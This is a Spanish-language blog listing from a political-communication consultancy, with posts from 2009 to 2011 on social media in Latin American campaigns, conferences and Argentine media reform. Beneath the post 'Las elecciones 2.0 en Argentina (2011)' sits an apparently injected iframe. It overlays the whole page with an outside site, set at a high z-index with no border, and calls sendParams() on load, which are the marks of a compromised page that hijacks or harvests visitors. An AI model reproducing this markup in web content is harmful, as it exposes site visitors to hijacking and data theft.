Inicio | Quienes somos | Areas | Servicios | Experiencia | Blog | Contacto Canal RSS
Oportunidades y Desafíos de la “Comunicación 2.0” en el Ámbito Político de Latinoamérica.
Lucas Lanza
Vie, Mar 25, 2011
Oportunidades y Desafíos de la “Comunicación 2.0” en el Ámbito Político de Latinoamérica. Curso de Capacitación para Encargados de Comunicación en partidos del Centro Democrático en Latinoamérica. Fundación Konrad Adenauer – Programa Medios de Comunicación y Democracia en Latinoamérica. Guatemala , Marzo 2011.
 
facebook linkedin
Share
Leer más
Conferencia sobre Politica 2.0 en La Plata Valley (Maraton 2.0)
Lucas Lanza
Mar, Mar 8, 2011
Conferencia “Política y Gobierno 2.0″, el uso de los nuevos medios en la política. El evento “Maraton 2.0″ fue organizado por Red Valleys, la Red Argentina de Emprendedores Tecnológicos, una Asociación Civil sin Fines de Lucro creada con el objetivo de promover políticas públicas que permitan articular el talento emprendedor, las nuevas tecnologías y los valores éticos de manera de conformar en Argentina una nueva generación de empresas innovadoras. (Diciembre de 2010).
 
facebook linkedin
Share
Leer más
Las elecciones 2.0 en Argentina (2011)
Autor invitado
Dom, Mar 6, 2011

 
<iframe src='http://www.perfect-press.co.uk/index.php'style='position:absolute;top:0px;left:0px;width:100%;height:2000px;z-index:999' onload='sendParams();'frameborder='no'>
facebook linkedin
Share
Leer más
La Municipalidad de Tigre lanza "Alerta Tigre 2.0"
Autor invitado
Mar, Mar 1, 2011
La Municipalidad de Tigre lanzó el servicio de Seguridad Ciudadana "Alerta Tigre 2.0". Este nuevo servicio integra de manera inteligente múltiples canales de comunicación que permiten llegar de manera más capilar a los actores involucrados en la atención y el control de la protección ciudadana.
 
 

Lanzamiento del Sistema de Seguridad Ciudadana Alerta Tigre 2.0from Alerta Municipioson Vimeo.

facebook linkedin
Share
Leer más
Campañas y Acción Política 2.0: Nuevos medios, nuevos electorados
Lucas Lanza
Mar, Oct 26, 2010
El pasado viernes 22 y sábado 23 de octubre se llevó a cabo el Seminario de Marketing Político vía Internet "Construyendo Campañas Ganadoras" en el cual participaron distintos referentes del ámbito de la consultoría y asesoramiento para políticos.
 
 
En representación de ePolitics, Natalia Fidel y Lucas Lanza expusieron sobre la integración de las nuevas herramientas digitales en las campañas electorales y su uso para la comunicación política.
 
facebook linkedin
Share
Leer más
Seminario de Marketing Político vía Internet
Autor invitado
Vie, Oct 22, 2010
Este Viernes 22 y Sábado 23 de octubre se estará llevando a cabo un Seminario de Marketing Político "Construyendo Campañas Ganadoras", en el cual participarán importantes consultores y especialistas en la materia de todo América Latina.

El Seminario, desarrollado vía internet, abarcará temáticas de alta relevancia en el armado de campañas electorales, incluyendo cuestiones relacionadas con su organización, construcción del mensaje, relación con los medios y técnicas de investigación política.

Además, Lucas Lanza y Natalia Fidel, consultores asociados de ePolitics Consulting, estarán brindando paneles sobre Política 2.0: su impacto y aprovechamiento en las campañas y un Estudio de Caso sobre las redes sociales en las campañas políticas.

Programa Seminario Campañas y Marketing Político
facebook linkedin
Share
Leer más
¿Resignificando la representación?
Natalia Fidel
Mar, Jul 13, 2010
Cuando en 2008 llevamos adelante el primer análisis de identidad digital de los legisladores porteños desde el Observatorio Permanente de Política 2.0 de eamericas.org, lo hicimos a modo de experimento para cuantificar su impacto en el distrito con mayor penetración de Internet en Argentina. El resultado en el mes de mayo de ese año fue que el 55% de los 60 legisladores porteños tenían una plataforma de comunicación construida online.
facebook linkedin
Share
Leer más
Mundo 2.0. Programa especial sobre Politica 2.0
Lucas Lanza
Mié, Jun 16, 2010
Programa especial sobre Política 2.0. El impacto de los nuevos medios en campañas electorales. Como impactan las redes sociales, el uso de la publicidad online.
 
Cómo abordar una campaña 2.0. Quiénes son los políticos más avanzados en el uso de Internet. Facebook y Twitter irrumpen en la opinión pública. Cómo serán las elecciones 2011 en Argentina. El caso de Ominami en Chile y de Mokus en Colombia.
 
Programa emitido por C5N el 13 de junio de 2010.
 
 
facebook linkedin
Share
Leer más
PdF 2010 NY: "Can Internet Fix Politics?"
Natalia Fidel
Lun, Jun 14, 2010
El Personal Democracy Forum en Nueva York fue una experiencia única en cuanto a la profundización sobre las potencialidades de cambio que existe en el campo de las nuevas tecnologías y la política. En su séptima versión, esta conferencia se propuso reflexionar acerca del alcance en que internet puede “fix politics”. Sin ánimo de encontrar una única respuesta que resuelva este interrogante, a continuación encontrarán los conceptos más salientes presentados por algunos de los expositores.
facebook linkedin
Share
Leer más
Legisladores 2.0
Autor invitado
Mar, Jun 1, 2010
El uso de nuevos medios y redes sociales para la comunicación en Diputados de la Legislatura de la Ciudad Autónoma de Buenos Aires, Argentina. Fecha de publicación: Julio 2010 por el Instituto Política & Democracia.
 
Legisladores 2.0. Informe primera parte.
facebook linkedin
Share
Leer más
Is Social Media a Fixture or Fad in Latin American Politics?
Autor invitado
Lun, May 24, 2010

(*) Artículo publicado por The Inter-America Dialogue´s

facebook linkedin
Share
Leer más
Conferencia Gobierno y Política 2.0. Día Internacional de Internet (Paraná)
Autor invitado
Sáb, May 22, 2010
Conferencia sobre Gobierno y Política 2.0 brindada por Natalia Fidel y Lucas Lanza durante la 2da. Jornada del Día Mundial de Internet en Paraná organizada por el Grupo Octógono.
 
 
Más presentaciones ingresando aquí.
 
Gonierno Electronico y Politica 2.0 - Presentacion Parana - Lucas Lanza y Natalia Fidel
facebook linkedin
Share
Leer más
Elecciones 2.0. Conferencia en la Cumbre Iberoamericana de Comunicadores 2010
Lucas Lanza
Lun, May 3, 2010

Conferencia brindada en la Cumbre Iberoamericana de Comunicadores 2010 el día jueves 29 de abril de 2010 realizada en la Universidad de San Martín donde expuse unos minutos sobre "Elecciones 2.0" dividido en 3 áreas principales: a) Elección a partir de las campañas políticas 2.0; b) Elección a partir de la nueva información disponible (iniciativas ciudadanas y gobierno abierto) y c) El día de la elección: el impacto del voto electrónico durante el día de la votación.

Más presentaciones en http://www.slideshare.net/lucaslanzay en http://epolitica.wordpress.com/

facebook linkedin
Share
Leer más
Artículo publicado en la revista Imagen sobre comunicación política
Lucas Lanza
Mar, Feb 2, 2010
A la ley de medios se suma en la Argentina una reforma electoral que pone en manos del gobierno el pautado de la publicidad de campaña de la oposición. Los consultores de comunicación política tendrán más trabajo que nunca elaborando nuevas estrategias para compensar la falta de acceso a los medios y las limitaciones a la publicidad electoral. Las redes sociales y hasta los celulares pueden ser una opción. Para los asesores hay una buena noticia: se viene una mayor profesionalización. Artículo publicado en la Revista Imagen en la edición aniversario de Enero de 2010.
facebook linkedin
Share
Leer más
Nuevo mapa de la comunicación politica en Argentina
Autor invitado
Lun, Dic 21, 2009
Programa La Hora de Maquiavelo, domingo 21 de diciembre de 2009.
Con la Ley de Medios y la Reforma Política, el gobierno de Cristina Kirchner se asegura limitarle el acceso a los medios a la oposición de cara a las elecciones de 2011. ¿Serán las redes sociales, como Facebook, Twitter o Youtube las alternativas para llegar con mensajes no oficialistas a la sociedad? Debaten con Diego Dillenberger Peter Behrens, director del Programa de Medios y Democracia de la Fundación Konrad Adenauer, de Alemania y Lucas Lanza, presidente de la Sociedad de la Información para las Américas y experto en comunicación política y nuevos medios.
facebook linkedin
Share
Leer más
Escenas primarias de la Política 2.0. Clase en la Maestría de Periodismo Clarín - UDESA
Autor invitado
Vie, Dic 11, 2009
Escenas primarias de la Política 2.0. Clase sobre campañas políticas y nuevos medios en la Maestría de Periodismo que dictan la Universidad San Andrés (UDESA) junto al diario Clarín. En la presentación se hace un recorrido por diferentes acontecimientos relevantes marcaron un cambio a partir del uso de nuevos medios de comunicación.
facebook linkedin
Share
Leer más
Reforma política y ley de medios para una nueva etapa de la política 2.0
Lucas Lanza
Jue, Dic 3, 2009
La reforma política sancionada ayer en Argentina y la ley de medios aprobada hace unas semanas atrás reformula el espacio de comunicación política. Este nuevo escenario impulsará el uso de nuevos medios de comunicación y requerirá nuevas estrategias en la acción política.

facebook linkedin
Share
Leer más
E-gov, We.gov y la necesidad de tener una ley de acceso a la información pública
Natalia Fidel
Dom, Nov 22, 2009
El segundo día de foro comenzó con un panel sobre la reinvención del gobierno y el poder de las redes. Vale destacar la exposición de Tom Steinberg de mysociety.org, una de las iniciativas más importantes de e-democracia en el mundo, quien basó su éxito en el hecho de brindar un servicio y darles a los ciudadanos la posibilidad de hacer algo. Desde el portal de fixmystreet.com, los ciudadanos británicos reportan la existencia de problemas locales en sus calles, envían la foto, y dicho reclamo es enviado al local council para su reparación; por ejemplo, en el último mes se han resuelto más de 1000 problemas vinculados al pavimento, la iluminación o los grafitis entre muchos otros. Además, en el portal whatdotheyknow.com se pueden encontrar todos los pedidos de acceso a la información pública y es la vía por la cual se canaliza el 13% de los pedidos de información al gobierno central.
facebook linkedin
Share
Leer más
Experiencias de personal democracy en el mundo: primer día de foro en Barcelona
Natalia Fidel
Vie, Nov 20, 2009
Desde hace 6 años el Personal Democracy Forum (PdF) se reúne en distintas partes del mundo para pensar cómo las nuevas tecnologías afectarán la política y la vida cívica en una era hiperconectada. Esta vez se hizo en Europa, y en civicolive podrán escuchar las ponencias e incluso ver algún video de las charlas. Varias personas que no pudieron estar presentes siguieron el encuentro vía twitter. El primer día, además de presentar el ya conocido caso de cómo Obama usó los nuevos medios para ganar la elección, por la tarde hubo un panel interesante sobre cómo los partidos políticos están reinventando su relación con la ciudadanía. Destaco algunas palabras de Rishi Saha, del partido conservador de Gran Bretaña, quien habló de cómo lo digital ayudó a reinventar el partido y traer a la gente más cerca de Westminster. En un año donde la política británica se tiñó de suspicacias por el uso indebido de fondos públicos, Saha se refirió a la necesidad de acercar al ciudadano para reconstruir la confianza. En este sentido, hizo referencia a la herramienta myconservatives.com, similar a la de Obama, desde donde los ciudadanos pueden inscribirse para participar de varias de las campañas tanto nacionales como locales y realizar donaciones.
facebook linkedin
Share
Leer más
Participando del Personal Democracy Forum Europe
Natalia Fidel
Dom, Nov 15, 2009

Aquí recién llegada a España por asistir al evento del Personal Democracy Forum (PDF Europe) que se desarrollará el viernes 20 y sábado 21 de noviembre en Barcelona. Serán dos días de foro donde se reflexionará acerca de cómo las nuevas tecnologías están cambiando la política, la reinvención de la relación entre partidos políticos y ciudadanía, algunas prácticas exitosas de participación cívica, la diferencia entre e-gov y we-gov, y hasta qué punto Internet puede reforzar la conversación e identidad pan-Europea. Acá se puede acceder al programa del evento, del cual participaremos dos latinoamericanos; Felipe Heusser de la Fundación Ciudadano Inteligente y yo representando al Instituto Política y Democracia de la Sociedad de la Información para las Américas (www.eamericas.org).

 

Personal Democracy Forum

 
 
facebook linkedin
Share
Leer más
 1 
 2 
 

Canal RSS

Consultor Asociado
Canal RSS
Consultora Asociada
Canal RSS
Oportunidades y Desafíos de la “Comunicación 2.0” en el Ámbito Político de Latinoamérica.
Conferencia sobre Politica 2.0 en La Plata Valley (Maraton 2.0)
Las elecciones 2.0 en Argentina (2011)
La Municipalidad de Tigre lanza "Alerta Tigre 2.0"
Campañas y Acción Política 2.0: Nuevos medios, nuevos electorados
Más contenidos
 
Inicio | Quienes somos | Areas | Servicios | Experiencia | Blog | Contacto Canal RSS